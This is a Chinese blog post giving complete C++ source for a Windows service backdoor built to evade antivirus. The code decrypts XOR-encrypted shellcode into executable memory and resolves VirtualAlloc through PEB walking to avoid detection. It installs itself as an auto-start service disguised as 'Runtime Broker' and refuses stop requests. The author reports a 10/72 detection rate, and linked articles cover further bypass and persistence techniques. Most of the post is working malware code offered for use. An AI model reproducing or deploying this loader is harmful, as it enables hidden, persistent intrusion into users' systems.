Windows免杀:服务后门

原创 已于 2022-10-13 22:05:58 修改 · 503 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows

于 2022-09-28 22:26:31 首次发布
本文介绍如何使用C++实现服务自启动,并在服务启动时执行Shellcode。主要内容包括Shellcode的异或加密与解密、服务的编写与启动流程、服务注册与隐藏窗口、以及如何通过修改服务响应请求等方式降低查杀率。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

通过给自身传递不同的参数来达到不同的行为,用服务的自启动代替应用程序的自启动

1:Payload 异或加密
单独使用加密程序进行加密:

#include<string>
#include <iostream>
using namespace std;
using std::string;
unsigned char buf[] = //Shellcode
int main() {
	string s;
	for (size_t i = 0; i < sizeof(buf); i++)
	{
		int n = buf[i] ^ 0x44;
		char c[5];
		sprintf_s(c, "\\x%x", n);
		s += c;
	}
	std::cout << s << std::endl;
	system("pause");
}

2:编写主体框架:

C++ 服务编写模板

#include <windows.h> 
#define SLEEP_TIME 120000//间隔时间
bool brun = false;
SERVICE_STATUS servicestatus;
SERVICE_STATUS_HANDLE hstatus;
void WINAPI ServiceMain(int argc, char** argv);
void WINAPI CtrlHandler(DWORD request);
void WINAPI ServiceMain(int argc, char** argv)
{
	servicestatus.dwServiceType = SERVICE_WIN32;
	servicestatus.dwCurrentState = SERVICE_START_PENDING;
	servicestatus.dwControlsAccepted = SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_STOP;
	servicestatus.dwWin32ExitCode = 0;
	servicestatus.dwServiceSpecificExitCode = 0;
	servicestatus.dwCheckPoint = 0;
	servicestatus.dwWaitHint = 0;
	hstatus = ::RegisterServiceCtrlHandler(L"lsload", CtrlHandler);
	if (hstatus == 0)
	{
		return;
	}
	servicestatus.dwCurrentState = SERVICE_RUNNING;
	SetServiceStatus(hstatus, &servicestatus);
	brun = true;
	while (brun)//任务循环
	{
		Sleep(SLEEP_TIME);
	}
}

void WINAPI CtrlHandler(DWORD request)
{
	switch (request)
	{
	case SERVICE_CONTROL_STOP:
		brun = false;
		servicestatus.dwCurrentState = SERVICE_STOPPED;
		break;
	case SERVICE_CONTROL_SHUTDOWN:
		brun = false;
		servicestatus.dwCurrentState = SERVICE_STOPPED;
		break;

	default:
		break;
	}
	SetServiceStatus(hstatus, &servicestatus);
}
int __cdecl wmain(int argc, char* argv[])
{
	SERVICE_TABLE_ENTRY entrytable[2];
	entrytable[0].lpServiceName = (LPWSTR)L"ServiceName";//服务名
	entrytable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
	entrytable[1].lpServiceName = NULL;
	entrytable[1].lpServiceProc = NULL;
	StartServiceCtrlDispatcher(entrytable);
	return 0;
}

3:添加功能:

//头文件及预定义
#include<tchar.h>
#include <Windows.h>
#include<iostream>
#include <io.h>
#define SLEEP_TIME 6000//后门重连间隔时间
#define SER_NAME _T("Runtime Broker")

bool brun = false;
using namespace std;
SERVICE_STATUS servicestatus;
SERVICE_STATUS_HANDLE hstatus;
typedef FARPROC(WINAPI* fGetProcAddress)(HMODULE, LPCSTR);
typedef LPVOID(WINAPI* fVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
string path = __argv[0];
  1. 执行Shellcode:
typedef FARPROC(WINAPI* fGetProcAddress)(HMODULE, LPCSTR);
typedef LPVOID(WINAPI* fVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);

size_t getKernelBase()
{
   return *(***(*((size_t*****)__readfsdword(0x30) + 3) + 7) + 2);
}

void Connect() {
   size_t hKernel = getKernelBase();
   PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)hKernel;
   PIMAGE_NT_HEADERS pImageNtHeader = (PIMAGE_NT_HEADERS)(pImageDosHeader->e_lfanew + hKernel);
   PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(pImageNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hKernel);
   size_t nameCount = pImageExportDirectory->NumberOfNames;
   size_t funcAddr = pImageExportDirectory->AddressOfFunctions + hKernel;
   size_t nameAddr = pImageExportDirectory->AddressOfNames + hKernel;
   size_t ordinal = pImageExportDirectory->AddressOfNameOrdinals + hKernel;
   fGetProcAddress fnGetProcAddress = NULL;
   for (size_t i = 0; i < nameCount; i++)
   {
   	USHORT* n = (USHORT*)(*(size_t*)(nameAddr + i * 4) + hKernel);
   	if (n[0] == 0x6547 && n[1] == 0x5074 && n[2] == 0x6f72 && n[3] == 0x4163 && n[4] == 0x6464 && n[5] == 0x6572 && n[6] == 0x7373)
   	{
   		fnGetProcAddress = (fGetProcAddress)(*(size_t*)(funcAddr + *(USHORT*)(ordinal + i * 2) * 4) + hKernel);
   	}
   }
   if (fnGetProcAddress == NULL)
   {
   	return;
   }
   size_t str1[4];
   str1[0] = 0x74726956;
   str1[1] = 0x416c6175;
   str1[2] = 0x636f6c6c;
   str1[3] = 0x0;
   fVirtualAlloc fnVirtualAlloc = (fVirtualAlloc)fnGetProcAddress((HMODULE)hKernel, (char*)str1);
   auto b = (void(*)())fnVirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
   memcpy(b, buf, sizeof(buf));
   for (size_t i = 0; i < sizeof(buf); i++)
   {
   	((unsigned char*)b)[i] ^= 0x44;
   }
   b();
}
  1. 启动时隐藏窗口:
void HideWindow() {
   HWND hwnd = GetForegroundWindow();
   ShowWindow(hwnd, SW_HIDE);
}
  1. 服务的自我注册:
    相关链接:通过API操作服务
    这里不用SC来注册,SC查得更严(相比与services.exe)
bool CreateAndStartService() {
  SC_HANDLE SCM = NULL;
  SC_HANDLE SER = NULL;
  bool s = false;
  do
  {
  	SCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
  	if (SCM == NULL)
  	{
  		break;
  	}
  	SER = CreateService(SCM, SER_NAME, SER_NAME, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, _T("\"C:\\Windows\\Virus\\Runtime Broker.exe\" s"),NULL,NULL,NULL,NULL,NULL);
  	if (SER == NULL)
  	{
  		break;
  	}
  	s = StartService(SER, NULL, NULL); 
  } while (false);
  return s;
}

4.修改服务响应的请求:

servicestatus.dwControlsAccepted = NULL; //在ServiceMain中,不响应任何请求

switch (request)//在CtrlHandler中,收到控制请求不响应
{
case SERVICE_CONTROL_STOP:
	break;
case SERVICE_CONTROL_SHUTDOWN:
	break;
default:
	break;
}

5.Main方法:

int __cdecl main(int argc, char** argv)
{
	if (argc >= 2)
	{
		string argv_s = argv[1];
		if (argv_s == "s")//作为服务运行
		{
			SERVICE_TABLE_ENTRY entrytable[2];
			entrytable[0].lpServiceName = (LPWSTR)L"Runtime Broker";//服务名
			entrytable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
			entrytable[1].lpServiceName = NULL;
			entrytable[1].lpServiceProc = NULL;
			StartServiceCtrlDispatcher(entrytable);
			return 0;
		}
		else if (argv_s == "c") {//反弹Shell
			Connect();
		}
	}
	else { //被双击运行
		HideWindow();
		string copycommand = "copy \"" + path + "\" C:\\Windows\\Virus"; 
		system("mkdir C:\\Windows\\Virus");
		system(copycommand.data());
		CreateAndStartService();
		exit(0);
	}
}

6:判断杀软:
判断杀软并获取PID:
C++ 判断某个程序是否正在运行,存在则返回PID

7.获取管理员权限(VS可以直接修改清单文件)
不修改清单文件:
C++ 获得管理员权限

完整代码:(查杀率: 10/72)
这里是已经通过修改清单文件获取管理员权限
不修改清单文件需要自己加功能
要再降低查杀率,可使用加密通信等手段:
免杀的N种姿势-基础篇
免杀的N种姿势-msf自免杀
免杀的N种姿势-msf篇

#include<tchar.h>
#include <Windows.h>
#include<iostream>
#include <io.h>
#define SLEEP_TIME 6000//间隔时间
#define SER_NAME _T("Runtime Broker")

bool brun = false;
using namespace std;
SERVICE_STATUS servicestatus;
SERVICE_STATUS_HANDLE hstatus;
typedef FARPROC(WINAPI* fGetProcAddress)(HMODULE, LPCSTR);
typedef LPVOID(WINAPI* fVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
string path = __argv[0];

int main(int argc,char** argv);
void WINAPI ServiceMain(int argc, char** argv); 
void WINAPI CtrlHandler(DWORD request); 
void Connect(); 
size_t getKernelBase(); 
void HideWindow(); 
bool CreateAndStartService();
char* StringToChar(const string& object);
unsigned char buf[] = //加密后的Shellcode

char* StringToChar(const string& object) {
	char* result = (char*)object.data();
	return result;
}

bool CreateAndStartService() {
	SC_HANDLE SCM = NULL;
	SC_HANDLE SER = NULL;
	bool s = false;
	do
	{
		SCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
		if (SCM == NULL)
		{
			break;
		}
		SER = CreateService(SCM, SER_NAME, SER_NAME, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, _T("\"C:\\Windows\\Virus\\Runtime Broker.exe\" s"),NULL,NULL,NULL,NULL,NULL);
		if (SER == NULL)
		{
			break;
		}
		s = StartService(SER, NULL, NULL); 
	} while (false);
	return s;
}
size_t getKernelBase()
{
	return *(***(*((size_t*****)__readfsdword(0x30) + 3) + 7) + 2);
}
void Connect() { 
	size_t hKernel = getKernelBase();
	PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)hKernel;
	PIMAGE_NT_HEADERS pImageNtHeader = (PIMAGE_NT_HEADERS)(pImageDosHeader->e_lfanew + hKernel);
	PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(pImageNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hKernel);
	size_t nameCount = pImageExportDirectory->NumberOfNames;
	size_t funcAddr = pImageExportDirectory->AddressOfFunctions + hKernel;
	size_t nameAddr = pImageExportDirectory->AddressOfNames + hKernel;
	size_t ordinal = pImageExportDirectory->AddressOfNameOrdinals + hKernel;
	fGetProcAddress fnGetProcAddress = NULL;
	for (size_t i = 0; i < nameCount; i++)
	{
		USHORT* n = (USHORT*)(*(size_t*)(nameAddr + i * 4) + hKernel);
		if (n[0] == 0x6547 && n[1] == 0x5074 && n[2] == 0x6f72 && n[3] == 0x4163 && n[4] == 0x6464 && n[5] == 0x6572 && n[6] == 0x7373)
		{
			fnGetProcAddress = (fGetProcAddress)(*(size_t*)(funcAddr + *(USHORT*)(ordinal + i * 2) * 4) + hKernel);
		}
	}
	if (fnGetProcAddress == NULL)
	{
		return;
	}
	size_t str1[4];
	str1[0] = 0x74726956;
	str1[1] = 0x416c6175;
	str1[2] = 0x636f6c6c;
	str1[3] = 0x0;
	fVirtualAlloc fnVirtualAlloc = (fVirtualAlloc)fnGetProcAddress((HMODULE)hKernel, (char*)str1);
	auto b = (void(*)())fnVirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(b, buf, sizeof(buf));
	for (size_t i = 0; i < sizeof(buf); i++)
	{
		((unsigned char*)b)[i] ^= 0x44;
	}
	b();
}
void WINAPI ServiceMain(int argc, char** argv)
{
	servicestatus.dwServiceType = SERVICE_WIN32;
	servicestatus.dwCurrentState = SERVICE_START_PENDING;
	servicestatus.dwControlsAccepted = NULL;
	servicestatus.dwWin32ExitCode = 0;
	servicestatus.dwServiceSpecificExitCode = 0;
	servicestatus.dwCheckPoint = 0;
	servicestatus.dwWaitHint = 0;
	hstatus = ::RegisterServiceCtrlHandler(L"lsload", CtrlHandler);
	if (hstatus == 0)
	{
		return;
	}
	servicestatus.dwCurrentState = SERVICE_RUNNING;
	SetServiceStatus(hstatus, &servicestatus);
	brun = true;
	while (brun)//任务循环
	{
		string c = "\"C:\\Windows\\Virus\\Runtime Broker.exe\" c";
		system(c.data());
		Sleep(SLEEP_TIME);
	}
}
void WINAPI CtrlHandler(DWORD request)
{
	switch (request)
	{
	case SERVICE_CONTROL_STOP:
		break;
	case SERVICE_CONTROL_SHUTDOWN:
		break;
	default:
		break;
	}
	SetServiceStatus(hstatus, &servicestatus);
}
void HideWindow() {
	HWND hwnd = GetForegroundWindow();
	ShowWindow(hwnd, SW_HIDE);
}
int __cdecl main(int argc, char** argv)
{

	if (argc >= 2)
	{
		string argv_s = argv[1];
		if (argv_s == "s")
		{
			SERVICE_TABLE_ENTRY entrytable[2];
			entrytable[0].lpServiceName = (LPWSTR)L"Runtime Broker";//服务名
			entrytable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
			entrytable[1].lpServiceName = NULL;
			entrytable[1].lpServiceProc = NULL;
			StartServiceCtrlDispatcher(entrytable);
			return 0;
		}
		else if (argv_s == "c") {
			Connect();
		}
	}
	else { 
		HideWindow();
		string copycommand = "copy \"" + path + "\" C:\\Windows\\Virus"; 
		system("mkdir C:\\Windows\\Virus");
		system(copycommand.data());
		CreateAndStartService();
		exit(0);
	}
}
[权限维持] Windows 权限维持 —— 影子账户后门 - 克隆账户
Blue17 の 小窝
02-28 941
问题描述  分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。做权限维持的前提是你已经拿到了靶机的一个权限(一般还是高权限,不然部分后门你还没有权限写入),所以我们得先用攻击机生成一个木马文件,上传靶机后运行,先拿到靶机的一个权限。这部分我们站在防守者视角,来排查下高级款的影子账户后门
WEB渗透篇-工具全集
qq_59468567的博客
08-19 2938
重写版Gh0st远控、大灰狼远控,目前可360、火绒、腾讯电脑管家等主流软。
Windows defender bypass |
jijisaq的博客
06-14 1341
在制作的过程中,翻找 Windows 官方对 Windows Defender 的介绍,发现有这样一个目录:Configure Microsoft Defender Antivirus exclusions on Windows Server(在 Windows server 中配置defender排除项)。简而言之就是在 Windows Server2016 和 2019 中,Windows Defender 默认存在一些排除项,在实时检测过程中会忽略这些排除项,但是主动扫描的时候不会排除。
服务后门自己做
小发猫
06-08 2269
服务后门自己做服务后门自己做  以往大多数的木马/后门都是通过修改系统ini文件(比如Win.ini,System.ini)或修改注册表的RUN值来实现自启动的,还有更简单的是修改Autobat.exe(老大,地球不适合你,你还是回火星吧),但随着网络用户安全意识的提高,连我家旁边卖茶叶蛋的大妈都知道如何对付这些老方法了。为了适应新时代木马后门技术的发展要求,一种利用Windows NT/20
应急响应:Windows权限维持--后门
最新发布
鹿鸣天涯
06-22 896
利用COM劫持技术,最为关键的是dll的实现以及CLSID的选择,通过修改CLSID下的注册表键值,实现对CAccPropServicesClass和MMDeviceEnumerator劫持,而系统很多正常程序启动时需要调用这两个实例。如果攻击者能够控制其中的某一 个目录,并且放一个恶意的DLL文件到这个目录下,这个恶意的DLL便会被进程所加载,从而造成代码执行。管理员在平时运维过程应当保持警惕,掌握一定的入侵排查技巧,及时进行系统补丁更新,定期对服务器安全检查,才能有效地预防后门
【权限维持】window服务端常见后门技术
10-20 1440
0x00 前言   未知攻焉知防,攻击者在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者如入无人之境。这里整理一些window服务端常见的后门技术,了解攻击者的常见后门技术,有助于更好去发现服务器安全问题。 常见的后门技术列表: 1、隐藏、克隆账户 2、shift后门 3、启动项、计划任务 4、劫持技术 5、Powershell后门 ...
Windows系统的四个后门
weixin_33850890的博客
11-19 343
  后门是***者出入系统的通道,惟其如此它隐蔽而危险。***者利用后门技术如入无人之境,这是用户的耻辱。针对Windows系统的后门是比较多的,对于一般的后门也为大家所熟知。下面笔者揭秘四个可能不为大家所 ...  后门是***者出入系统的通道,惟其如此它隐蔽而危险。***者利用后门技术如入无人之境,这是用户的耻辱。针对Windows系统的后门是比较多的,对于一般的后门也为...
利用MSBuild制作msf后门
热门推荐
Matthew
09-22 6万+
今天看到三好学生对MSBuild的利用,它的好处这里已经说完,http://bobao.360.cn/learning/detail/3046.html,说可以有提供一种直接执行shellcode的方法,然后就尝试了一下通过MSBuild进行msf的木马后门。         我这次选择了32位的那个版本来进行演示:      需要改写的是shellcode那部分:
Seay2012 SHIFT后门: 体验与系统提权
该程序被标榜为“”,意味着它设计有特殊的机制或技术来规避毒软件的检测。这通常涉及代码混淆、加密、多态性或是在操作系统的某些隐蔽区域运行等手段。 4. 仿系统界面的后门程序: 后门程序是指在计算机系统...
实战shell&C2远控&工具魔改(日记 - 上篇)
guanjian_ci的博客
06-05 7978
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过毒软件的本质就是防止被毒库匹配,代码、工具指纹等等!3、一个好的,一定具备了多方面的性能:防软、绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
揭秘shift后门超强技术及操作细节
1. 文件命名的含义:文件名称"shift后门"直接对应了标题中的“shift后门超强版”,表明文件是该后门程序的一种分发形式。 2. VB语言与后门程序:文件名称中的"vb"可能是指后门程序中使用的编程语言为Visual ...
最新超级的五次后门
04-13
五次后门大家都知道的啊!~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ghost完全版(过国内所有主流软)
02-21
Ghost完全版(过国内所有主流软)Ghost完全版(过国内所有主流软)Ghost完全版(过国内所有主流软)Ghost完全版(过国内所有主流软)Ghost完全版(过国内所有主流软)Ghost完全版(过国内所有主流软)
早期抗启发式查win32壳(源代码)
04-04
xvirus早期抗启发式查win32壳-master
Windows下简单技巧
vortex5的博客
02-28 1599
Windows 下的技术是一项重要的渗透测试技能。通过利用工具如Shellter和PowerShell,我们可以在不被防病毒软件检测的情况下,将恶意代码注入到目标机器的内存中,或者利用合法程序进行隐藏。技术不仅有助于渗透测试,还可以帮助安全研究人员深入理解恶意软件的防护机制,并为增强防护措施提供有价值的见解。
Window下常见的权限维持方式
12-02 4万+
在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 0x01 注册表自启动 通过修改注册表自启动键值,添加一个木马程序路径,实现开机自启动。 常用的注册表启动键: # Run键 HKEY_CURRENT_USER\Software\Microsoft\Win...
Windows木马+维持权限(shellter)
lingmessy的博客
04-08 1486
Windows木马+维持权限 一.生成木马 工具:shellter 环境:windows xp,Windows 7 操作: cmd 打开 shellter.exe 选择a,y 输入要注入木马的程序路径 选择y,l,1 输入返回的ip 最后回车就好了 二.开始监听 环境:kali 命令: msfconsole use exploit/multi/handler set...
魔改冰蝎 —— 绕过检测,自动生成后门
m0_60870041的博客
02-02 2226
学会开发小玩意儿
后门程序分析
AlwaysBetter
09-05 239
程序大体上解密data中shellcode后,跳转到shellcode执行,所以直接放上shellcode的分析
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

海鸥的诀别诗

谢谢,龙咬会继续努力的!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值